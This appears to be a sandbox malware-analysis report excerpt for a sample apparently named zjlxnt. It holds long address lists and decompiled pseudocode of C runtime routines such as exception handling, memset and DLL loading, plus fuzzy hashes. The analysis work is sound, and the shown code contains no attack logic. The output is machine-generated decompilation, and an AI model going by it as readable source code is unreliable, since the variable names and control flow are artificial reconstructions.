                                                          0x00403e40
                                                          0x00403e40
                                                          0x00403e43
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e43
                                                          0x00403e36
                                                          0x00403e36
                                                          0x00403e39
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e39
                                                          0x00403e29
                                                          0x00403e29
                                                          0x00403e2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e2c
                                                          0x00403e48
                                                          0x00403df4
                                                          0x00403df4
                                                          0x00403df4
                                                          0x00403df7
                                                          0x00403df7
                                                          0x00403df9
                                                          0x00403dfb
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dfd
                                                          0x00403dff
                                                          0x00403e13
                                                          0x00403e13
                                                          0x00403e01
                                                          0x00403e01
                                                          0x00403e04
                                                          0x00403e07
                                                          0x00000000
                                                          0x00403e09
                                                          0x00403e09
                                                          0x00403e0c
                                                          0x00403e0f
                                                          0x00403e11
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e11
                                                          0x00403e07
                                                          0x00403e1c
                                                          0x00403e1c
                                                          0x00403e1e
                                                          0x00000000
                                                          0x00403e20
                                                          0x00403e20
                                                          0x00403e20
                                                          0x00000000
                                                          0x00403e1e
                                                          0x00403e17
                                                          0x00403e19
                                                          0x00403e19
                                                          0x00000000
                                                          0x00403e19
                                                          0x00403de6
                                                          0x00403de6
                                                          0x00403de9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403de9
                                                          0x00403de4
                                                          0x00403ddc
                                                          0x00403e4f
                                                          0x00403e53
                                                          0x00403e53
                                                          0x00403925
                                                          0x00403925
                                                          0x0040392e
                                                          0x00403a2b
                                                          0x00403a2b
                                                          0x00403a2e
                                                          0x00000000
                                                          0x0040395d
                                                          0x0040395d
                                                          0x00403962
                                                          0x00000000
                                                          0x00403968
                                                          0x00403968
                                                          0x00403970
                                                          0x00403c24
                                                          0x00403c28
                                                          0x00403976
                                                          0x0040397b
                                                          0x0040397e
                                                          0x00403983
                                                          0x0040398a
                                                          0x0040398f
                                                          0x00000000
                                                          0x004039c7
                                                          0x004039cf
                                                          0x00403a33
                                                          0x00403a33
                                                          0x00403a36
                                                          0x00403a39
                                                          0x00403a3b
                                                          0x00403a3e
                                                          0x00403a41
                                                          0x00403a47
                                                          0x00403bf3
                                                          0x00403bf3
                                                          0x00403bf6
                                                          0x00000000
                                                          0x00403bf8
                                                          0x00403bf8
                                                          0x00403bfb
                                                          0x00000000
                                                          0x00403c01
                                                          0x00403c01
                                                          0x00403c04
                                                          0x00403c07
                                                          0x00403c08
                                                          0x00403c09
                                                          0x00403c0c
                                                          0x00403c0d
                                                          0x00403c10
                                                          0x00403c11
                                                          0x00403c16
                                                          0x00000000
                                                          0x00403c16
                                                          0x00403bfb
                                                          0x00403a4d
                                                          0x00403a4d
                                                          0x00403a51
                                                          0x00000000
                                                          0x00403a57
                                                          0x00403a57
                                                          0x00403a5e
                                                          0x00403a76
                                                          0x00403a76
                                                          0x00403a79
                                                          0x00403a7c
                                                          0x00403a82
                                                          0x00403a92
                                                          0x00403a97
                                                          0x00403a9a
                                                          0x00403a9d
                                                          0x00403aa0
                                                          0x00403aa3
                                                          0x00403aa6
                                                          0x00403aa9
                                                          0x00403aaf
                                                          0x00403aaf
                                                          0x00403ab2
                                                          0x00403ab5
                                                          0x00403ac4
                                                          0x00403ac5
                                                          0x00403ac5
                                                          0x00403ac7
                                                          0x00403aca
                                                          0x00403ad0
                                                          0x00403ad3
                                                          0x00403ad9
                                                          0x00403adb
                                                          0x00403ade
                                                          0x00403ae1
                                                          0x00403ae7
                                                          0x00403aea
                                                          0x00403aef
                                                          0x00403aef
                                                          0x00403af2
                                                          0x00403af5
                                                          0x00403af8
                                                          0x00403afb
                                                          0x00403afe
                                                          0x00403b03
                                                          0x00403b04
                                                          0x00403b05
                                                          0x00403b06
                                                          0x00403b07
                                                          0x00403b0a
                                                          0x00403b0d
                                                          0x00403b0f
                                                          0x00000000
                                                          0x00403b11
                                                          0x00403b11
                                                          0x00403b11
                                                          0x00403b12
                                                          0x00403b14
                                                          0x00403b17
                                                          0x00403b18
                                                          0x00403b1d
                                                          0x00403b20
                                                          0x00403b22
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b24
                                                          0x00403b27
                                                          0x00403b28
                                                          0x00403b2b
                                                          0x00403b2d
                                                          0x00000000
                                                          0x00403b2f
                                                          0x00403b2f
                                                          0x00403b32
                                                          0x00000000
                                                          0x00403b32
                                                          0x00000000
                                                          0x00403b2d
                                                          0x00403b46
                                                          0x00403b4c
                                                          0x00403b69
                                                          0x00403b6e
                                                          0x00403b6e
                                                          0x00403b71
                                                          0x00403b71
                                                          0x00000000
                                                          0x00403b35
                                                          0x00403b35
                                                          0x00403b36
                                                          0x00403b39
                                                          0x00403b3c
                                                          0x00403b3f
                                                          0x00403b3f
                                                          0x00000000
                                                          0x00403b44
                                                          0x00403ae1
                                                          0x00403ad3
                                                          0x00403b74
                                                          0x00403b77
                                                          0x00403b78
                                                          0x00403b7b
                                                          0x00403b7e
                                                          0x00403b81
                                                          0x00403b84
                                                          0x00403b84
                                                          0x00403b8d
                                                          0x00403b90
                                                          0x00403b90
                                                          0x00403aa9
                                                          0x00403b93
                                                          0x00403b97
                                                          0x00403b99
                                                          0x00403b9c
                                                          0x00403ba2
                                                          0x00403ba2
                                                          0x00403baa
                                                          0x00403baf
                                                          0x00403c19
                                                          0x00403c19
                                                          0x00403c1e
                                                          0x00403c22
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403bb1
                                                          0x00403bb4
                                                          0x00403bb7
                                                          0x00403bbb
                                                          0x00403bc9
                                                          0x00403bcb
                                                          0x00403be2
                                                          0x00403be6
                                                          0x00403bec
                                                          0x00403bed
                                                          0x00403bef
                                                          0x00000000
                                                          0x00403bf1
                                                          0x00000000
                                                          0x00403bf1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403bbd
                                                          0x00403bbd
                                                          0x00403bbf
                                                          0x00000000
                                                          0x00403bc1
                                                          0x00403bc1
                                                          0x00403bc5
                                                          0x00000000
                                                          0x00403bc7
                                                          0x00403bcd
                                                          0x00403bd2
                                                          0x00403bd5
                                                          0x00403bda
                                                          0x00403bdd
                                                          0x00000000
                                                          0x00403bdd
                                                          0x00403bc5
                                                          0x00403bbf
                                                          0x00403bbb
                                                          0x00403a60
                                                          0x00403a60
                                                          0x00403a67
                                                          0x00000000
                                                          0x00403a69
                                                          0x00403a69
                                                          0x00403a70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a70
                                                          0x00403a67
                                                          0x00403a5e
                                                          0x00403a51
                                                          0x004039d1
                                                          0x004039d9
                                                          0x004039dc
                                                          0x004039e1
                                                          0x004039e5
                                                          0x004039e8
                                                          0x004039ee
                                                          0x004039f1
                                                          0x00000000
                                                          0x004039f3
                                                          0x004039f3
                                                          0x004039f6
                                                          0x004039f8
                                                          0x00403c29
                                                          0x00403c29
                                                          0x00000000
                                                          0x004039fe
                                                          0x00403a06
                                                          0x00403a11
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a1a
                                                          0x00403a1d
                                                          0x00403a1e
                                                          0x00403a21
                                                          0x00403a23
                                                          0x00000000
                                                          0x00403a29
                                                          0x00000000
                                                          0x00403a29
                                                          0x00000000
                                                          0x00403a23
                                                          0x004039fe
                                                          0x00403c2e
                                                          0x00403c2e
                                                          0x00403c30
                                                          0x00403c31
                                                          0x00403c38
                                                          0x00403c3b
                                                          0x00403c49
                                                          0x00403c4e
                                                          0x00403c53
                                                          0x00403c56
                                                          0x00403c5b
                                                          0x00403c5e
                                                          0x00403c61
                                                          0x00403c63
                                                          0x00403c65
                                                          0x00403c65
                                                          0x00403c6a
                                                          0x00403c76
                                                          0x00403c7c
                                                          0x00403c81
                                                          0x00403c84
                                                          0x00403c85
                                                          0x00000000
                                                          0x00403c85
                                                          0x004039f1
                                                          0x004039cf
                                                          0x0040398f
                                                          0x00403970
                                                          0x00403962
                                                          0x0040392e

                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                                                          • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 2751267872-393685449
                                                          • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                          • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                                                          • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                          • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				char _v5;
                                                          				signed int _v12;
                                                          				char _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				signed int _v32;
                                                          				signed char _v36;
                                                          				void* _v40;
                                                          				signed int _t77;
                                                          				signed int _t84;
                                                          				intOrPtr _t85;
                                                          				void* _t86;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t89;
                                                          				signed int _t91;
                                                          				int _t93;
                                                          				signed int _t98;
                                                          				intOrPtr* _t102;
                                                          				intOrPtr _t103;
                                                          				signed int _t107;
                                                          				char _t109;
                                                          				signed int _t113;
                                                          				void* _t114;
                                                          				intOrPtr _t123;
                                                          				void* _t125;
                                                          				intOrPtr _t133;
                                                          				signed int _t135;
                                                          				void* _t139;
                                                          				void* _t141;
                                                          				void* _t149;
                                                          
                                                          				_t118 = __edx;
                                                          				_t102 = _a4;
                                                          				_push(__edi);
                                                          				_v5 = 0;
                                                          				_v16 = 1;
                                                          				 *_t102 = E0040D360(__ecx,  *_t102);
                                                          				_t103 = _a8;
                                                          				_t6 = _t103 + 0x10; // 0x11
                                                          				_t133 = _t6;
                                                          				_push(_t133);
                                                          				_v20 = _t133;
                                                          				_v12 =  *(_t103 + 8) ^  *0x415010;
                                                          				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
                                                          				E00402967(_a12);
                                                          				_t77 = _a4;
                                                          				_t141 = _t139 - 0x1c + 0x10;
                                                          				_t123 =  *((intOrPtr*)(_t103 + 0xc));
                                                          				if(( *(_t77 + 4) & 0x00000066) != 0) {
                                                          					__eflags = _t123 - 0xfffffffe;
                                                          					if(_t123 != 0xfffffffe) {
                                                          						_t118 = 0xfffffffe;
                                                          						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
                                                          						goto L13;
                                                          					}
                                                          					goto L14;
                                                          				} else {
                                                          					_v32 = _t77;
                                                          					_v28 = _a12;
                                                          					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
                                                          					if(_t123 == 0xfffffffe) {
                                                          						L14:
                                                          						return _v16;
                                                          					} else {
                                                          						do {
                                                          							_t107 = _v12;
                                                          							_t84 = _t123 + (_t123 + 2) * 2;
                                                          							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
                                                          							_t85 = _t107 + _t84 * 4;
                                                          							_t108 =  *((intOrPtr*)(_t85 + 4));
                                                          							_v24 = _t85;
                                                          							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                                                          								_t109 = _v5;
                                                          								goto L7;
                                                          							} else {
                                                          								_t118 = _t133;
                                                          								_t86 = E004028F0(_t108, _t133);
                                                          								_t109 = 1;
                                                          								_v5 = 1;
                                                          								_t149 = _t86;
                                                          								if(_t149 < 0) {
                                                          									_v16 = 0;
                                                          									L13:
                                                          									_push(_t133);
                                                          									E004022D0(_t103, _t118, _t123, _t133, _v12);
                                                          									goto L14;
                                                          								} else {
                                                          									if(_t149 > 0) {
                                                          										_t87 = _a4;
                                                          										__eflags =  *_t87 - 0xe06d7363;
                                                          										if( *_t87 == 0xe06d7363) {
                                                          											__eflags =  *0x40e1c4;
                                                          											if(__eflags != 0) {
                                                          												_t98 = E0040D1F0(__eflags, "<&@");
                                                          												_t141 = _t141 + 4;
                                                          												__eflags = _t98;
                                                          												if(_t98 != 0) {
                                                          													_t135 =  *0x40e1c4; // 0x40263c
                                                          													 *0x40e160(_a4, 1);
                                                          													 *_t135();
                                                          													_t133 = _v20;
                                                          													_t141 = _t141 + 8;
                                                          												}
                                                          												_t87 = _a4;
                                                          											}
                                                          										}
                                                          										_t119 = _t87;
                                                          										E00402930(_t87, _a8, _t87);
                                                          										_t89 = _a8;
                                                          										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
                                                          										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
                                                          											_t119 = _t123;
                                                          											E00402950(_t89, _t123, _t133, 0x415010);
                                                          											_t89 = _a8;
                                                          										}
                                                          										_push(_t133);
                                                          										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
                                                          										E004022D0(_t103, _t119, _t123, _t133, _v12);
                                                          										E00402910();
                                                          										asm("int3");
                                                          										asm("int3");
                                                          										asm("int3");
                                                          										_t113 = _v32;
                                                          										_t91 = _v36 & 0x000000ff;
                                                          										_t125 = _v40;
                                                          										__eflags = _t113;
                                                          										if(_t113 == 0) {
                                                          											L46:
                                                          											return _v40;
                                                          										} else {
                                                          											_t93 = _t91 * 0x1010101;
                                                          											__eflags = _t113 - 0x20;
                                                          											if(_t113 <= 0x20) {
                                                          												L39:
                                                          												__eflags = _t113 & 0x00000003;
                                                          												while((_t113 & 0x00000003) != 0) {
                                                          													 *_t125 = _t93;
                                                          													_t125 = _t125 + 1;
                                                          													_t113 = _t113 - 1;
                                                          													__eflags = _t113 & 0x00000003;
                                                          												}
                                                          												__eflags = _t113 & 0x00000004;
                                                          												if((_t113 & 0x00000004) != 0) {
                                                          													 *_t125 = _t93;
                                                          													_t125 = _t125 + 4;
                                                          													_t113 = _t113 - 4;
                                                          													__eflags = _t113;
                                                          												}
                                                          												__eflags = _t113 & 0xfffffff8;
                                                          												while((_t113 & 0xfffffff8) != 0) {
                                                          													 *_t125 = _t93;
                                                          													 *(_t125 + 4) = _t93;
                                                          													_t125 = _t125 + 8;
                                                          													_t113 = _t113 - 8;
                                                          													__eflags = _t113 & 0xfffffff8;
                                                          												}
                                                          												goto L46;
                                                          											} else {
                                                          												__eflags = _t113 - 0x80;
                                                          												if(__eflags < 0) {
                                                          													L33:
                                                          													asm("bt dword [0x415030], 0x1");
                                                          													if(__eflags >= 0) {
                                                          														goto L39;
                                                          													} else {
                                                          														asm("movd xmm0, eax");
                                                          														asm("pshufd xmm0, xmm0, 0x0");
                                                          														goto L35;
                                                          													}
                                                          												} else {
                                                          													asm("bt dword [0x415c68], 0x1");
                                                          													if(__eflags >= 0) {
                                                          														asm("bt dword [0x415030], 0x1");
                                                          														if(__eflags >= 0) {
                                                          															goto L39;
                                                          														} else {
                                                          															asm("movd xmm0, eax");
                                                          															asm("pshufd xmm0, xmm0, 0x0");
                                                          															_t114 = _t125 + _t113;
                                                          															asm("movups [edi], xmm0");
                                                          															_t125 = _t125 + 0x00000010 & 0xfffffff0;
                                                          															_t113 = _t114 - _t125;
                                                          															__eflags = _t113 - 0x80;
                                                          															if(__eflags <= 0) {
                                                          																goto L33;
                                                          															} else {
                                                          																do {
                                                          																	asm("movdqa [edi], xmm0");
                                                          																	asm("movdqa [edi+0x10], xmm0");
                                                          																	asm("movdqa [edi+0x20], xmm0");
                                                          																	asm("movdqa [edi+0x30], xmm0");
                                                          																	asm("movdqa [edi+0x40], xmm0");
                                                          																	asm("movdqa [edi+0x50], xmm0");
                                                          																	asm("movdqa [edi+0x60], xmm0");
                                                          																	asm("movdqa [edi+0x70], xmm0");
                                                          																	_t125 = _t125 + 0x80;
                                                          																	_t113 = _t113 - 0x80;
                                                          																	__eflags = _t113 & 0xffffff00;
                                                          																} while ((_t113 & 0xffffff00) != 0);
                                                          																L35:
                                                          																__eflags = _t113 - 0x20;
                                                          																if(_t113 < 0x20) {
                                                          																	L38:
                                                          																	asm("movdqu [edi], xmm0");
                                                          																	asm("movdqu [edi+0x10], xmm0");
                                                          																	return _v40;
                                                          																} else {
                                                          																	do {
                                                          																		asm("movdqu [edi], xmm0");
                                                          																		asm("movdqu [edi+0x10], xmm0");
                                                          																		_t125 = _t125 + 0x20;
                                                          																		_t113 = _t113 - 0x20;
                                                          																		__eflags = _t113 - 0x20;
                                                          																	} while (_t113 >= 0x20);
                                                          																	__eflags = _t113 & 0x0000001f;
                                                          																	if((_t113 & 0x0000001f) == 0) {
                                                          																		goto L46;
                                                          																	} else {
                                                          																		goto L38;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													} else {
                                                          														memset(_t125, _t93, _t113 << 0);
                                                          														return _v40;
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									} else {
                                                          										goto L7;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L47;
                                                          							L7:
                                                          							_t123 = _t103;
                                                          						} while (_t103 != 0xfffffffe);
                                                          						if(_t109 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				L47:
                                                          			}


































                                                          0x00402310
                                                          0x00402317
                                                          0x0040231b
                                                          0x0040231c
                                                          0x00402322
                                                          0x0040232e
                                                          0x00402330
                                                          0x00402336
                                                          0x00402336
                                                          0x0040233f
                                                          0x00402341
                                                          0x00402344
                                                          0x00402347
                                                          0x0040234f
                                                          0x00402354
                                                          0x00402357
                                                          0x0040235a
                                                          0x00402361
                                                          0x004023bd
                                                          0x004023c0
                                                          0x004023c8
                                                          0x004023cf
                                                          0x00000000
                                                          0x004023cf
                                                          0x00000000
                                                          0x00402363
                                                          0x00402363
                                                          0x00402369
                                                          0x0040236f
                                                          0x00402375
                                                          0x004023e0
                                                          0x004023e9
                                                          0x00402377
                                                          0x00402377
                                                          0x00402377
                                                          0x0040237d
                                                          0x00402380
                                                          0x00402383
                                                          0x00402386
                                                          0x00402389
                                                          0x0040238e
                                                          0x004023a4
                                                          0x00000000
                                                          0x00402390
                                                          0x00402390
                                                          0x00402392
                                                          0x00402397
                                                          0x00402399
                                                          0x0040239c
                                                          0x0040239e
                                                          0x004023b4
                                                          0x004023d4
                                                          0x004023d4
                                                          0x004023d8
                                                          0x00000000
                                                          0x004023a0
                                                          0x004023a0
                                                          0x004023ea
                                                          0x004023ed
                                                          0x004023f3
                                                          0x004023f5
                                                          0x004023fc
                                                          0x00402403
                                                          0x00402408
                                                          0x0040240b
                                                          0x0040240d
                                                          0x0040240f
                                                          0x0040241c
                                                          0x00402422
                                                          0x00402424
                                                          0x00402427
                                                          0x00402427
                                                          0x0040242a
                                                          0x0040242a
                                                          0x004023fc
                                                          0x00402430
                                                          0x00402432
                                                          0x00402437
                                                          0x0040243a
                                                          0x0040243d
                                                          0x00402445
                                                          0x00402449
                                                          0x0040244e
                                                          0x0040244e
                                                          0x00402451
                                                          0x00402455
                                                          0x00402458
                                                          0x00402468
                                                          0x0040246d
                                                          0x0040246e
                                                          0x0040246f
                                                          0x00402470
                                                          0x00402474
                                                          0x0040247b
                                                          0x0040247f
                                                          0x00402481
                                                          0x004025c3
                                                          0x004025c9
                                                          0x00402487
                                                          0x00402487
                                                          0x0040248d
                                                          0x00402490
                                                          0x00402575
                                                          0x00402575
                                                          0x0040257b
                                                          0x0040257d
                                                          0x0040257f
                                                          0x00402580
                                                          0x00402583
                                                          0x00402583
                                                          0x0040258b
                                                          0x00402591
                                                          0x00402593
                                                          0x00402595
                                                          0x00402598
                                                          0x00402598
                                                          0x00402598
                                                          0x0040259b
                                                          0x004025a1
                                                          0x004025b0
                                                          0x004025b2
                                                          0x004025b5
                                                          0x004025b8
                                                          0x004025bb
                                                          0x004025bb
                                                          0x00000000
                                                          0x00402496
                                                          0x00402496
                                                          0x0040249c
                                                          0x0040252d
                                                          0x0040252d
                                                          0x00402535
                                                          0x00000000
                                                          0x00402537
                                                          0x00402537
                                                          0x0040253b
                                                          0x00000000
                                                          0x0040253b
                                                          0x004024a2
                                                          0x004024a2
                                                          0x004024aa
                                                          0x004024b5
                                                          0x004024bd
                                                          0x00000000
                                                          0x004024c3
                                                          0x004024c3
                                                          0x004024c7
                                                          0x004024cc
                                                          0x004024ce
                                                          0x004024d4
                                                          0x004024d7
                                                          0x004024d9
                                                          0x004024df
                                                          0x00000000
                                                          0x004024f0
                                                          0x004024f0
                                                          0x004024f0
                                                          0x004024f4
                                                          0x004024f9
                                                          0x004024fe
                                                          0x00402503
                                                          0x00402508
                                                          0x0040250d
                                                          0x00402512
                                                          0x00402517
                                                          0x0040251d
                                                          0x00402523
                                                          0x00402523
                                                          0x00402540
                                                          0x00402540
                                                          0x00402543
                                                          0x00402561
                                                          0x00402565
                                                          0x00402569
                                                          0x00402574
                                                          0x00402545
                                                          0x00402545
                                                          0x00402545
                                                          0x00402549
                                                          0x0040254e
                                                          0x00402551
                                                          0x00402554
                                                          0x00402554
                                                          0x00402559
                                                          0x0040255f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040255f
                                                          0x00402543
                                                          0x004024df
                                                          0x004024ac
                                                          0x004024ac
                                                          0x004024b4
                                                          0x004024b4
                                                          0x004024aa
                                                          0x0040249c
                                                          0x00402490
                                                          0x004023a2
                                                          0x00000000
                                                          0x004023a2
                                                          0x004023a0
                                                          0x0040239e
                                                          0x00000000
                                                          0x004023a7
                                                          0x004023a7
                                                          0x004023a9
                                                          0x004023b0
                                                          0x00000000
                                                          0x004023b2
                                                          0x00000000
                                                          0x004023b0
                                                          0x00402375
                                                          0x00000000

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00402347
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                                                          • _ValidateLocalCookies.LIBCMT ref: 004023D8
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                                                          • _ValidateLocalCookies.LIBCMT ref: 00402458
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: <&@$csm
                                                          • API String ID: 1170836740-4289465445
                                                          • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                          • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                                                          • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                          • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                          				signed int _v8;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				WCHAR* _t26;
                                                          				signed int _t29;
                                                          				void** _t30;
                                                          				signed int* _t35;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          
                                                          				_t35 = _a4;
                                                          				while(_t35 != _a8) {
                                                          					_t29 =  *_t35;
                                                          					_v8 = _t29;
                                                          					_t38 =  *(0x416300 + _t29 * 4);
                                                          					if(_t38 == 0) {
                                                          						_t26 =  *(0x40fa88 + _t29 * 4);
                                                          						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                                                          						if(_t38 != 0) {
                                                          							L14:
                                                          							_t30 = 0x416300 + _v8 * 4;
                                                          							 *_t30 = _t38;
                                                          							if( *_t30 != 0) {
                                                          								FreeLibrary(_t38);
                                                          							}
                                                          							L16:
                                                          							_t20 = _t38;
                                                          							L13:
                                                          							return _t20;
                                                          						}
                                                          						_t22 = GetLastError();
                                                          						if(_t22 != 0x57) {
                                                          							L9:
                                                          							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
                                                          							L10:
                                                          							_t35 =  &(_t35[1]);
                                                          							continue;
                                                          						}
                                                          						_t22 = E00405A18(_t26, L"api-ms-", 7);
                                                          						_t40 = _t40 + 0xc;
                                                          						if(_t22 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_t22 = E00405A18(_t26, L"ext-ms-", 7);
                                                          						_t40 = _t40 + 0xc;
                                                          						if(_t22 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                                                          						_t38 = _t22;
                                                          						if(_t38 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					if(_t38 != 0xffffffff) {
                                                          						goto L16;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          				_t20 = 0;
                                                          				goto L13;
                                                          			}












                                                          0x004082dc
                                                          0x00408371
                                                          0x004082e4
                                                          0x004082e6
                                                          0x004082f0
                                                          0x004082f5
                                                          0x00408302
                                                          0x00408317
                                                          0x0040831b
                                                          0x00408381
                                                          0x00408386
                                                          0x0040838d
                                                          0x00408391
                                                          0x00408394
                                                          0x00408394
                                                          0x0040839a
                                                          0x0040839a
                                                          0x0040837c
                                                          0x00408380
                                                          0x00408380
                                                          0x0040831d
                                                          0x00408326
                                                          0x0040835f
                                                          0x0040836c
                                                          0x0040836e
                                                          0x0040836e
                                                          0x00000000
                                                          0x0040836e
                                                          0x00408330
                                                          0x00408335
                                                          0x0040833a
                                                          0x00000000
                                                          0x00000000
                                                          0x00408344
                                                          0x00408349
                                                          0x0040834e
                                                          0x00000000
                                                          0x00000000
                                                          0x00408353
                                                          0x00408359
                                                          0x0040835d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040835d
                                                          0x004082fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408300
                                                          0x0040837a
                                                          0x00000000

                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,93C85C54,?,004083E2,00000002,00000000,00000000), ref: 00408394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3664257935-537541572
                                                          • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                          • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                                                          • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                          • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E004029C1(void* __ecx) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t13;
                                                          				void* _t14;
                                                          				void* _t18;
                                                          				void* _t23;
                                                          				long _t24;
                                                          				void* _t27;
                                                          
                                                          				_t13 = __ecx;
                                                          				if( *0x415040 != 0xffffffff) {
                                                          					_t24 = GetLastError();
                                                          					_t11 = E00402CA4(_t13,  *0x415040);
                                                          					_t14 = _t23;
                                                          					if(_t11 == 0xffffffff) {
                                                          						L5:
                                                          						_t11 = 0;
                                                          					} else {
                                                          						if(_t11 == 0) {
                                                          							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
                                                          								_push(0x28);
                                                          								_t27 = E004057DE();
                                                          								_t18 = 1;
                                                          								if(_t27 == 0) {
                                                          									L8:
                                                          									_t11 = 0;
                                                          									E00402CDF(_t18,  *0x415040, 0);
                                                          								} else {
                                                          									_t8 = E00402CDF(_t18,  *0x415040, _t27);
                                                          									_pop(_t18);
                                                          									if(_t8 != 0) {
                                                          										_t11 = _t27;
                                                          										_t27 = 0;
                                                          									} else {
                                                          										goto L8;
                                                          									}
                                                          								}
                                                          								E0040571A(_t27);
                                                          							} else {
                                                          								goto L5;
                                                          							}
                                                          						}
                                                          					}
                                                          					SetLastError(_t24);
                                                          					return _t11;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}











                                                          0x004029c1
                                                          0x004029c8
                                                          0x004029db
                                                          0x004029e2
                                                          0x004029e4
                                                          0x004029e8
                                                          0x00402a01
                                                          0x00402a01
                                                          0x004029ea
                                                          0x004029ec
                                                          0x004029ff
                                                          0x00402a06
                                                          0x00402a0f
                                                          0x00402a12
                                                          0x00402a15
                                                          0x00402a29
                                                          0x00402a29
